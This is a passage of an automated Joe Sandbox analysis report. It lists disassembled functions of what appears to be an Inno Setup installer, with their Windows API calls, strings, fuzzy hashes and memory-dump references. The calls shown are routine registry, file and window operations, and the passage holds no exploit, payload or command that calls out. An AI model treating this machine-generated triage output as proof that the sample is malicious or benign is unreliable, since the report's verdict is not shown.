                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A022A08830$A480
                                                                            • String ID:
                                                                            • API String ID: 3036329673-0
                                                                            • Opcode ID: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                            • Instruction ID: 94861c3129a932f854b236b0087f7367a4de39103189020794ca85cb03cdcc47
                                                                            • Opcode Fuzzy Hash: 194e3fff164acdd9274630c615ac113e6c237e1a8584744cad8ee02aea33715e
                                                                            • Instruction Fuzzy Hash: 6F01DF7121C3806AD200B63E8C85A9F6BED8FCA314F15556EF498DB382CA7ACC018765
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047509C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,00476895,?,00000000,00000000,00000001,00000000,00475339,?,00000000), ref: 004752FD
                                                                            Strings
                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00475171
                                                                            • Failed to parse "reg" constant, xrefs: 00475304
                                                                            • XPG, xrefs: 00475196
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant$XPG
                                                                            • API String ID: 3535843008-221462518
                                                                            • Opcode ID: 2ad844ec3d3387f5df215a59a8183cae574ced7ce954c6da98f45587ceaedfea
                                                                            • Instruction ID: efa73f53bf694626ca38b284cffe8b81a50960838d42bcbe4388b938de67f833
                                                                            • Opcode Fuzzy Hash: 2ad844ec3d3387f5df215a59a8183cae574ced7ce954c6da98f45587ceaedfea
                                                                            • Instruction Fuzzy Hash: 2C814174E00548AFCB10EF95C881ADEBBF9AF44355F50816AE814FB391D778AE05CB98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00424C50 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041EFE4: GetActiveWindow.USER32 ref: 0041EFE7
                                                                              • Part of subcall function 0041EFE4: GetCurrentThreadId.KERNEL32 ref: 0041EFFC
                                                                              • Part of subcall function 0041EFE4: 73A15940.USER32(00000000,Function_0001EFC0), ref: 0041F002
                                                                              • Part of subcall function 00423118: GetSystemMetrics.USER32(00000000), ref: 0042311A
                                                                            • OffsetRect.USER32(?,?,?), ref: 00424D39
                                                                            • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424DFC
                                                                            • OffsetRect.USER32(?,?,?), ref: 00424E0D
                                                                              • Part of subcall function 004234D4: GetCurrentThreadId.KERNEL32 ref: 004234E9
                                                                              • Part of subcall function 004234D4: SetWindowsHookExA.USER32(00000003,00423490,00000000,00000000), ref: 004234F9
                                                                              • Part of subcall function 004234D4: CreateThread.KERNEL32(00000000,000003E8,00423440,00000000,00000000), ref: 0042351D
                                                                              • Part of subcall function 00424A9C: SetTimer.USER32(00000000,00000001,?,00423424), ref: 00424AB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CurrentOffsetRect$A15940ActiveCreateDrawHookMetricsSystemTextTimerWindowWindows
                                                                            • String ID: KB
                                                                            • API String ID: 4121718042-1869488878
                                                                            • Opcode ID: ba4daf257325cbcca7612a03de97b8ebc6b1ca257ff465a9f0c405e7408712a1
                                                                            • Instruction ID: ae1ca80dbbb80d562d58c988e2a096fec0eb4d76cb14d5a08aa48516f4e8acc9
                                                                            • Opcode Fuzzy Hash: ba4daf257325cbcca7612a03de97b8ebc6b1ca257ff465a9f0c405e7408712a1
                                                                            • Instruction Fuzzy Hash: 89811771A002189FDB14DFA8D884ADEBBB5FF48314F5045AAE904AB296DB38AD45CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406F0C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00406F6B
                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00406FE5
                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 0040703D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                            • String ID: Z
                                                                            • API String ID: 3604996873-1505515367
                                                                            • Opcode ID: 3e23b715a30e1b5c3429261b8d124dbcf9289215ab71e09fab44fa3001b00485
                                                                            • Instruction ID: 7c0b9131d06079f5eec8a494c30c5fea0581ab0ea086ea85159b160c15df41a2
                                                                            • Opcode Fuzzy Hash: 3e23b715a30e1b5c3429261b8d124dbcf9289215ab71e09fab44fa3001b00485
                                                                            • Instruction Fuzzy Hash: FB514170E042099FDB11EF55C941A9EBBB9FB09304F5041BAE540BB3D1C778AE418F5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044C854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetRectEmpty.USER32(?), ref: 0044C8E2
                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C90D
                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C995
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DrawText$EmptyRect
                                                                            • String ID:
                                                                            • API String ID: 182455014-2867612384
                                                                            • Opcode ID: d0c3e2c7287d8feafc52a027ec46cb3325a20517415fc8e523dc578fc7dbd799
                                                                            • Instruction ID: 131ceb366f2beb704c5e67361b9b215d261598caf296ae96956cdec3368353cb
                                                                            • Opcode Fuzzy Hash: d0c3e2c7287d8feafc52a027ec46cb3325a20517415fc8e523dc578fc7dbd799
                                                                            • Instruction Fuzzy Hash: 8F5172B1900248AFDB50DFA9C885BDEBBF9FF48314F08447AE845EB252D7389944CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042E8C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,00000000,0042EA1C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E8F2
                                                                              • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
                                                                            • SelectObject.GDI32(?,00000000), ref: 0042E915
                                                                            • 73A0A480.USER32(00000000,?,0042EA01,00000000,0042E9FA,?,00000000,00000000,0042EA1C,?,?,?,?,00000000,00000000,00000000), ref: 0042E9F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A480A570CreateFontIndirectObjectSelect
                                                                            • String ID: ...\
                                                                            • API String ID: 2998766281-983595016
                                                                            • Opcode ID: 9df2e027a5ad20ed6d7352ee69e297a86736b9e25cbcddb4c0eeddf445b1d3af
                                                                            • Instruction ID: 308711b3510e2d142e5f8917cb1a7286c815dd25c3ebae82bdfc5a56718784f8
                                                                            • Opcode Fuzzy Hash: 9df2e027a5ad20ed6d7352ee69e297a86736b9e25cbcddb4c0eeddf445b1d3af
                                                                            • Instruction Fuzzy Hash: 79315070B00129ABDF11EB9AD841BAEB7B8FF49304F90447BF410A7291D7789E41CA69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0048CE6C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 92registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,0048CF6A,?,?,00000001,00000000,00000000,0048CF85), ref: 0048CF53
                                                                            Strings
                                                                            • %s\%s_is1, xrefs: 0048CEE4
                                                                            • Inno Setup CodeFile: , xrefs: 0048CF16
                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0048CEC6
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: %s\%s_is1$Inno Setup CodeFile: $Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                            • API String ID: 47109696-1837835967
                                                                            • Opcode ID: a5317e2cdf1504813c9fe7444e3c67d1a119a8e89a958819ee54ab3caef088f8
                                                                            • Instruction ID: 9198a2c89c650ecdb9ea5b928749e7ef7688678c62cd245957542d324bac4bf5
                                                                            • Opcode Fuzzy Hash: a5317e2cdf1504813c9fe7444e3c67d1a119a8e89a958819ee54ab3caef088f8
                                                                            • Instruction Fuzzy Hash: 9B316374A042045FDB01EFA5DC91A9EBBF9EB4C704F50447BE604E7391D7789A058B68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00416380 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
                                                                            • UnregisterClassA.USER32(?,00400000), ref: 0041641B
                                                                            • RegisterClassA.USER32(?), ref: 0041643E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Class$InfoRegisterUnregister
                                                                            • String ID: @
                                                                            • API String ID: 3749476976-2766056989
                                                                            • Opcode ID: 5b73e54eb71c748753e3b8d1054902b7c0852253915f9ea95734fd2023c17c48
                                                                            • Instruction ID: 182fc5ce89434e719f204c44de6314d23bdba4c1adcba5a9141eaa64fba15999
                                                                            • Opcode Fuzzy Hash: 5b73e54eb71c748753e3b8d1054902b7c0852253915f9ea95734fd2023c17c48
                                                                            • Instruction Fuzzy Hash: F4318E702042008BD760EF68C881B9B77E5AB88308F00447FFA85CB392DB39D9448B6E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00492028 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,004928F5,00000000,0049211E,?,?,00000000,00494628), ref: 00492098
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,004928F5,00000000,0049211E,?,?,00000000,00494628), ref: 004920C1
                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004920DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$Attributes$Move
                                                                            • String ID: isRS-%.3u.tmp
                                                                            • API String ID: 3839737484-3657609586
                                                                            • Opcode ID: bf2922b1aaa6c30ca688b35688b4cf24069c5c6910dd478e72a2b9c309e37070
                                                                            • Instruction ID: b810cc2a7e5d2205544a106a5c70962c88f81ee0cc3f37104223c1277275e24c
                                                                            • Opcode Fuzzy Hash: bf2922b1aaa6c30ca688b35688b4cf24069c5c6910dd478e72a2b9c309e37070
                                                                            • Instruction Fuzzy Hash: 92216470D00219BFDF14EFA9C9829AFBBB9EB54314F10453AB814B72D1D6785E018A59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                            • ExitProcess.KERNEL32 ref: 00404E0D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ExitMessageProcess
                                                                            • String ID: Error$Runtime error at 00000000
                                                                            • API String ID: 1220098344-2970929446
                                                                            • Opcode ID: a06c2f23053dee05738a3b3847c410c2c592315d1a0ade8e47e6ee14016d8d79
                                                                            • Instruction ID: 4d0016c8d5fe4094e25e5fe0be570a8f0713ad45d294035ab8c8bb1c6a4e5ebc
                                                                            • Opcode Fuzzy Hash: a06c2f23053dee05738a3b3847c410c2c592315d1a0ade8e47e6ee14016d8d79
                                                                            • Instruction Fuzzy Hash: 7421B360A442418ADB21AB75EC81F163BD197EA349F04817BE700B77E6C67C894687AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00454C5C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                            • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00454CB0
                                                                            • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00454CDD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                            • String ID: LoadTypeLib$RegisterTypeLib
                                                                            • API String ID: 1312246647-2435364021
                                                                            • Opcode ID: f61e69b483cb001645570106c37636ac553a9824954e6e8b6d66c00c2f183d59
                                                                            • Instruction ID: d9fba730cb80c63aa19026fdd437f4fece929029815e2f29f966a9b9864a7c3d
                                                                            • Opcode Fuzzy Hash: f61e69b483cb001645570106c37636ac553a9824954e6e8b6d66c00c2f183d59
                                                                            • Instruction Fuzzy Hash: C411B430A00604AFDB11DFA6DC51A5EB7BDEBC9709B108476FD04D7651DA389D48C614
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047363C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowkeyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            • GetFocus.USER32 ref: 004736A7
                                                                            • GetKeyState.USER32(0000007A), ref: 004736B9
                                                                            • WaitMessage.USER32(?,00000000,004736E0,?,00000000,00473707,?,?,00000001,00000000,?,?,?,?,0047AADF,00000000), ref: 004736C3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                            • String ID: Wnd=$%x
                                                                            • API String ID: 1381870634-2927251529
                                                                            • Opcode ID: b6f1723f8a55a4a9afafee02d062e7fd811883cc0c30f314c2a81b90cb0acb04
                                                                            • Instruction ID: f4d105e05b809c76e67ff73c629a241912eba9488d1d76ce0f5d4fdfd1301c88
                                                                            • Opcode Fuzzy Hash: b6f1723f8a55a4a9afafee02d062e7fd811883cc0c30f314c2a81b90cb0acb04
                                                                            • Instruction Fuzzy Hash: 67119170600244BFC710EF65DC52A9E7BB8EB49705B5184BAF408E3751D63DAE00DA6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046A044 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046A04C
                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046A05B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$LocalSystem
                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                            • API String ID: 1748579591-1013271723
                                                                            • Opcode ID: dc3105fb6ee909ab4cd4d42845ef41477d175ff5fb8b3213b724df48f3a92d37
                                                                            • Instruction ID: 9e815eb500cce11188de23773c3f03aef7f324e38ca19cda18ee53b31b17b2fc
                                                                            • Opcode Fuzzy Hash: dc3105fb6ee909ab4cd4d42845ef41477d175ff5fb8b3213b724df48f3a92d37
                                                                            • Instruction Fuzzy Hash: 9B11F8A140C3919ED340DF2AC44436BBAE4AB89704F44896EF9D8D6381E779C948DB77
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004527D6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004527E3
                                                                              • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452808
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                            • String ID: DeleteFile$MoveFile
                                                                            • API String ID: 3024442154-139070271
                                                                            • Opcode ID: 8a70b1347f387fedb58c3f0c09c3bda5820d5cffeb643f0c2558e4fcea15fbdb
                                                                            • Instruction ID: 7497217c6fa166c3be30eb44807793be619cf2db8189df8da4fe663aa424cbd4
                                                                            • Opcode Fuzzy Hash: 8a70b1347f387fedb58c3f0c09c3bda5820d5cffeb643f0c2558e4fcea15fbdb
                                                                            • Instruction Fuzzy Hash: 8EF062746041045AE701FAA5DA4366FA3ECEB4530AF61403BF800B76C3DA7C9D094929
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00457770 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004578A2,00000000,004579EF,?,00000000,00000000,00000000), ref: 004577BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                            • API String ID: 47109696-2631785700
                                                                            • Opcode ID: 6e8da870c8621b75cc6768b696cde9fcf8d5864872e34247e5d0abe67aef6327
                                                                            • Instruction ID: a26262d4258d3973e1aab989b25d4896129656d7849361439c1335197d99e5e3
                                                                            • Opcode Fuzzy Hash: 6e8da870c8621b75cc6768b696cde9fcf8d5864872e34247e5d0abe67aef6327
                                                                            • Instruction Fuzzy Hash: D5F0FF327141106FC710EB1AFC45F0E6688DB9839AF10803BB940C725AC678DC0AC62D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047DDD8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047DE19
                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047DE3C
                                                                            Strings
                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 0047DDE6
                                                                            • CSDVersion, xrefs: 0047DE10
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                            • API String ID: 3677997916-1910633163
                                                                            • Opcode ID: 7813b641c3abcab23e33f1a9844fd0c9a7e2724cdb6d20ee4d37ca6bcb8a843c
                                                                            • Instruction ID: 975d92485e8303bca6679b963d7ec8b17629a584e5fbb74d879917827c530b39
                                                                            • Opcode Fuzzy Hash: 7813b641c3abcab23e33f1a9844fd0c9a7e2724cdb6d20ee4d37ca6bcb8a843c
                                                                            • Instruction Fuzzy Hash: 5CF0A475E10609AADF11DAD0CC45BEF73BCAF14304F208567EA18EB280E7789A04CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

